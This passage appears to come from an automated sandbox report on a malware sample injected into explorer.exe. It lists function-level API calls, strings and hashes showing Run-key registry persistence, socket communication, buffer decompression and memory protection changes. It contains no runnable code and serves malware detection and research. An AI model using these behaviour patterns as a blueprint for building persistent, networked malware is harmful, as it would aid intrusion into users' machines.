                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseDeleteOpenValue
                          • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 849931509-2226521311
                          • Opcode ID: fb276229a674de8715936c9b58969c6cc9acf20c30ef889c208bad92fac1ddce
                          • Instruction ID: f76a5665491e86aebd43a4a427dc0042f9b29fab6f697da145b9b9206e2b6fcd
                          • Opcode Fuzzy Hash: fb276229a674de8715936c9b58969c6cc9acf20c30ef889c208bad92fac1ddce
                          • Instruction Fuzzy Hash: B801F475214A45D2EF28DF55E8543D57370F784B59F800229EEAE426B8DF2CC24AD744
                          Function 011B0AC0 Relevance: 13.6, APIs: 9, Instructions: 148memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocalund_memcpy$FreeVirtual
                          • String ID:
                          • API String ID: 2616075706-0
                          • Opcode ID: 2a9f05bee8dbbb8b72bb69cf12b0853c41c36a6a931afabf8e845caff4e88dcf
                          • Instruction ID: 7e64f5a0d29a3540781b806cd13b122452247720baa75921b29a33efa0cbcecb
                          • Opcode Fuzzy Hash: 2a9f05bee8dbbb8b72bb69cf12b0853c41c36a6a931afabf8e845caff4e88dcf
                          • Instruction Fuzzy Hash: B981AE767096C09ADBB4CB19E4907EBB7A0E7C9784F408026EB8987B58DF3CD5848F40
                          Function 011BE7A0 Relevance: 13.6, APIs: 9, Instructions: 98COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _lock.LIBCMT ref: 011BE7C9
                            • Part of subcall function 011C0C94: _amsg_exit.LIBCMT ref: 011C0CBE
                          • DecodePointer.KERNEL32(?,?,?,?,?,00000000,00000000,011BE98D,?,?,00000000,011C0CC3,?,?,00000000,011BACB5), ref: 011BE7FC
                          • DecodePointer.KERNEL32(?,?,?,?,?,00000000,00000000,011BE98D,?,?,00000000,011C0CC3,?,?,00000000,011BACB5), ref: 011BE81A
                          • DecodePointer.KERNEL32(?,?,?,?,?,00000000,00000000,011BE98D,?,?,00000000,011C0CC3,?,?,00000000,011BACB5), ref: 011BE85A
                          • DecodePointer.KERNEL32(?,?,?,?,?,00000000,00000000,011BE98D,?,?,00000000,011C0CC3,?,?,00000000,011BACB5), ref: 011BE874
                          • DecodePointer.KERNEL32(?,?,?,?,?,00000000,00000000,011BE98D,?,?,00000000,011C0CC3,?,?,00000000,011BACB5), ref: 011BE884
                          • _initterm.LIBCMT ref: 011BE8C4
                          • _initterm.LIBCMT ref: 011BE8D7
                          • ExitProcess.KERNEL32 ref: 011BE910
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
                          • String ID:
                          • API String ID: 3873167975-0
                          • Opcode ID: a1f47c094e4e4953c5fab44b72d2a893ed509ee766285a7135e593ee47be9210
                          • Instruction ID: e35d620c3a3b4a73f32c12ba47f167b4e9b5c86e3047e7a46fc5dc62721afdbb
                          • Opcode Fuzzy Hash: a1f47c094e4e4953c5fab44b72d2a893ed509ee766285a7135e593ee47be9210
                          • Instruction Fuzzy Hash: 19316631212F5182EA589B15FCC43DAA6A5FB88BD8F040539EB8E43B64EF38C496C740
                          Function 011A4780 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 139COMMON
                          Download Yara Rule
                          APIs
                          • setsockopt.WS2_32 ref: 011A482D
                          • shutdown.WS2_32 ref: 011A4B57
                          • closesocket.WS2_32 ref: 011A4B62
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timer$ChangeConcurrency::details::platform::__Queueclosesocketsetsockoptshutdown
                          • String ID: $!$"$#
                          • API String ID: 2104284462-1968938309
                          • Opcode ID: a043c244513a51406772d522da2fb0a37924ee5b3aedf25c67c640e4eaa52c9a
                          • Instruction ID: 6c70abd014d71e1a464d3a14f0cb5c72064572cc410416944f6042753f1b9da2
                          • Opcode Fuzzy Hash: a043c244513a51406772d522da2fb0a37924ee5b3aedf25c67c640e4eaa52c9a
                          • Instruction Fuzzy Hash: 0D819F76208BC58AE7748F05E4883DABBA4F3D8348F544129D6C94BB99DBBEC148CF40
                          Function 011B32BF Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73threadsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventObjectResumeSingleWait
                          • String ID: d
                          • API String ID: 3200977696-2564639436
                          • Opcode ID: f5302871f297c8678636ad51d7a76881c1e65371eb42b55c65bece8cb42385e9
                          • Instruction ID: 9e3456078538e8073800b569bd55db4b3f06893d537e89dd84aecfebfda5dcd6
                          • Opcode Fuzzy Hash: f5302871f297c8678636ad51d7a76881c1e65371eb42b55c65bece8cb42385e9
                          • Instruction Fuzzy Hash: F831A736218B8486DB58DB1AF49439AB7B0F3C9B94F115126EB9E43B68CF7DC495CB00
                          Function 0119DCB0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          • setsockopt.WS2_32 ref: 0119DD60
                          • OpenEventW.KERNEL32 ref: 0119DDBE
                          • SetEvent.KERNEL32 ref: 0119DDDF
                          • CloseHandle.KERNEL32 ref: 0119DDED
                          • shutdown.WS2_32 ref: 0119DDFD
                          • closesocket.WS2_32 ref: 0119DE08
                            • Part of subcall function 0119FBA0: CreateDirectoryW.KERNEL32 ref: 0119FBD8
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FBE3
                            • Part of subcall function 0119FBA0: LocalAlloc.KERNEL32 ref: 0119FBFE
                            • Part of subcall function 0119FBA0: CreateFileW.KERNEL32 ref: 0119FC6E
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FC79
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD16
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD21
                          Strings
                          • {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}, xrefs: 0119DDB0
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CreateErrorEventFreeLast$AllocCloseDirectoryFileHandleOpenclosesocketsetsockoptshutdown
                          • String ID: {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}
                          • API String ID: 1185697187-2411808274
                          • Opcode ID: 2bdff3738b774a56051df30cc75428fcdc530801698b2222cc13ded8fef0f17c
                          • Instruction ID: 1693062237fcc11b2b4484266db393d63e6f3da38c4c380940d4fb30fdf901a2
                          • Opcode Fuzzy Hash: 2bdff3738b774a56051df30cc75428fcdc530801698b2222cc13ded8fef0f17c
                          • Instruction Fuzzy Hash: 6E31EA36209B8486EB64DF95F8443DAB7A0F788794F504126EB9D87BA8DF7CC049CB40
                          Function 011941D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}, xrefs: 0119422E
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$CloseHandleObjectOpenResetSingleWait
                          • String ID: {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}
                          • API String ID: 1560999653-2411808274
                          • Opcode ID: 2294103b1f4efe47382a228110117bf86dd9773aad3f9980b1010b855fc37aac
                          • Instruction ID: b659229e123ca56a926033ae2fd00f2db8613f540a98fc46b1e69d6a38f4cc90
                          • Opcode Fuzzy Hash: 2294103b1f4efe47382a228110117bf86dd9773aad3f9980b1010b855fc37aac
                          • Instruction Fuzzy Hash: B1210E30908610C6EF3DAB64FB443E977E0F7C6759F54026AD65A419A5CF3CC19BCA05
                          Function 01194570 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 50registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegCreateKeyExW.ADVAPI32 ref: 011945F4
                          • RegSetValueExW.ADVAPI32 ref: 0119462B
                          • RegCloseKey.ADVAPI32 ref: 0119463A
                          • RegCloseKey.ADVAPI32 ref: 0119464C
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$CreateValue_errno_invalid_parameter_noinfo
                          • String ID: ?$SOFTWARE\%s${7EE6EBB8-7FBC-4C3E-AAB8-F5FE9571F428}
                          • API String ID: 3235468379-2136347929
                          • Opcode ID: 1ba05bfe231b7bc14a5afd147c891102e6ae11a47e7b12bdb5d6c95cd2a4b907
                          • Instruction ID: bd4bc66aab6b6eaef74717b15adfa0123d7093f60c826be3b68153a40338b892
                          • Opcode Fuzzy Hash: 1ba05bfe231b7bc14a5afd147c891102e6ae11a47e7b12bdb5d6c95cd2a4b907
                          • Instruction Fuzzy Hash: 15211A72218B8486EB64DF25F89479AB7A1F784794F804126AA9983B68DFBCC145CB40
                          Function 011A3DE0 Relevance: 12.2, APIs: 8, Instructions: 188memoryCOMMON
                          Download Yara Rule
                          APIs
                          • setsockopt.WS2_32 ref: 011A3E95
                          • LocalAlloc.KERNEL32 ref: 011A4002
                            • Part of subcall function 011B4870: WSACreateEvent.WS2_32 ref: 011B4909
                          • LocalAlloc.KERNEL32 ref: 011A4080
                          • RtlDecompressBuffer.NTDLL ref: 011A40D1
                          • LocalFree.KERNEL32 ref: 011A414E
                            • Part of subcall function 011A6520: LocalFree.KERNEL32 ref: 011A659C
                            • Part of subcall function 011A6520: LocalFree.KERNEL32 ref: 011A65AF
                            • Part of subcall function 011A6520: LocalAlloc.KERNEL32 ref: 011A6607
                            • Part of subcall function 011A6520: LocalAlloc.KERNEL32 ref: 011A6628
                            • Part of subcall function 011A6520: lstrcpyW.KERNEL32 ref: 011A6660
                            • Part of subcall function 011A6520: lstrcpyW.KERNEL32 ref: 011A6679
                            • Part of subcall function 011A6520: lstrcpyW.KERNEL32 ref: 011A6692
                          • LocalFree.KERNEL32 ref: 011A4167
                          • shutdown.WS2_32 ref: 011A420D
                          • closesocket.WS2_32 ref: 011A4218
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                            • Part of subcall function 011B4870: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocFreeTimer$lstrcpy$ChangeConcurrency::details::platform::__Queue$BufferCreateDecompressEventclosesocketsetsockoptshutdown
                          • String ID:
                          • API String ID: 3399760138-0
                          • Opcode ID: 0a80d5ac3141bfa836ddd80b6f3969d78254eaf35f97484459d60846b02bd736
                          • Instruction ID: 341b75e13a13b646204805375c6c185e7f4414a9c0a5d19133074d846fc7ca2e
                          • Opcode Fuzzy Hash: 0a80d5ac3141bfa836ddd80b6f3969d78254eaf35f97484459d60846b02bd736
                          • Instruction Fuzzy Hash: 17A1D776208B818AD774DB14E44479ABBA4F389794F504225EBDD83FA9EBBCD184CF40
                          Function 011B4470 Relevance: 12.1, APIs: 8, Instructions: 99timememorynetworkCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32 ref: 011B44D2
                          • htons.WS2_32 ref: 011B44FF
                          • wsprintfA.USER32 ref: 011B4534
                            • Part of subcall function 011B4750: WSACreateEvent.WS2_32 ref: 011B4768
                            • Part of subcall function 011B4750: WSAEventSelect.WS2_32 ref: 011B478F
                            • Part of subcall function 011B4750: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47E4
                            • Part of subcall function 011B4750: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B455A), ref: 011B47F3
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4578
                            • Part of subcall function 011B34E0: send.WS2_32 ref: 011B350C
                            • Part of subcall function 011B4630: WSACreateEvent.WS2_32 ref: 011B4648
                            • Part of subcall function 011B4630: WSAEventSelect.WS2_32 ref: 011B466F
                            • Part of subcall function 011B4630: WSAWaitForMultipleEvents.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46C4
                            • Part of subcall function 011B4630: WSACloseEvent.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,011B45A0), ref: 011B46D3
                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B45BB
                            • Part of subcall function 011B34A0: recv.WS2_32 ref: 011B34CC
                          • und_memcpy.LIBCMTD ref: 011B45F9
                          • LocalFree.KERNEL32 ref: 011B4603
                          • LocalFree.KERNEL32 ref: 011B4612
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpywsprintf
                          • String ID:
                          • API String ID: 3834521385-0
                          • Opcode ID: ca480580499e125196a7ef1158afeadfd1568d2c42ac1e082b87a86da38a7eca
                          • Instruction ID: 1acdfb9501472de9bc10875d974a7625c88dcc1589e97aea7a55f76424abf124
                          • Opcode Fuzzy Hash: ca480580499e125196a7ef1158afeadfd1568d2c42ac1e082b87a86da38a7eca
                          • Instruction Fuzzy Hash: 3941A576618B84C6CB549B1AE4C075ABBB0F789B94F509116EF8E83B29CB3DC485CF00
                          Function 011C0BAC Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _FF_MSGBANNER.LIBCMT ref: 011C0BD3
                            • Part of subcall function 011BEC1C: _set_error_mode.LIBCMT ref: 011BEC25
                            • Part of subcall function 011BEC1C: _set_error_mode.LIBCMT ref: 011BEC34
                            • Part of subcall function 011BE9BC: _set_error_mode.LIBCMT ref: 011BEA01
                            • Part of subcall function 011BE9BC: _set_error_mode.LIBCMT ref: 011BEA12
                            • Part of subcall function 011BE9BC: GetModuleFileNameW.KERNEL32 ref: 011BEA74
                            • Part of subcall function 011BE60C: ExitProcess.KERNEL32 ref: 011BE61B
                            • Part of subcall function 011C06CC: malloc.LIBCMT ref: 011C06F7
                            • Part of subcall function 011C06CC: Sleep.KERNEL32(?,?,00000000,011C0C0D,?,?,?,011C0CB7,?,?,00000000,011BACB5,?,?,00000000,011BAD6C), ref: 011C070A
                          • _errno.LIBCMT ref: 011C0C15
                          • _lock.LIBCMT ref: 011C0C29
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,011C0CB7,?,?,00000000,011BACB5,?,?,00000000,011BAD6C,?,?,00000000,011BADA3), ref: 011C0C3F
                          • free.LIBCMT ref: 011C0C4C
                          • _errno.LIBCMT ref: 011C0C51
                          • LeaveCriticalSection.KERNEL32(?,?,?,011C0CB7,?,?,00000000,011BACB5,?,?,00000000,011BAD6C,?,?,00000000,011BADA3), ref: 011C0C74
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                          • String ID:
                          • API String ID: 113790786-0
                          • Opcode ID: 2f8944b12a80035ce86664f26001b78c40556f4495f1295f9827a06761f7b46b
                          • Instruction ID: a1b3bd9c0c8f8e7d7a9f540d7fcd6ea15c77c7413c6630d92483a207a7e28089
                          • Opcode Fuzzy Hash: 2f8944b12a80035ce86664f26001b78c40556f4495f1295f9827a06761f7b46b
                          • Instruction Fuzzy Hash: 7F21C439A05742C2E72DAF25E8D47AA7364FBA8F88F05543DEA4A47790CF3CD4408359
                          Function 011B0670 Relevance: 10.7, APIs: 7, Instructions: 201memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: und_memcpy$Local$AllocFreeProtectVirtual
                          • String ID:
                          • API String ID: 3065580769-0
                          • Opcode ID: 8bb7e0b0bc2b2b624155ecf4ed186a6d852528b2306715bfc9ae6f26d54f369d
                          • Instruction ID: 0f494a1c8e0717b1cc79b406c34357a9b7b6dfd9a861492963b8df979e0d3008
                          • Opcode Fuzzy Hash: 8bb7e0b0bc2b2b624155ecf4ed186a6d852528b2306715bfc9ae6f26d54f369d
                          • Instruction Fuzzy Hash: 38A1BB7660A6C19BE7B5CB19E5917EBB7A0E7C9340F008025EBC98BB58EB3CD5448F41
                          Function 011BF398 Relevance: 10.7, APIs: 7, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • GetStartupInfoW.KERNEL32 ref: 011BF3B9
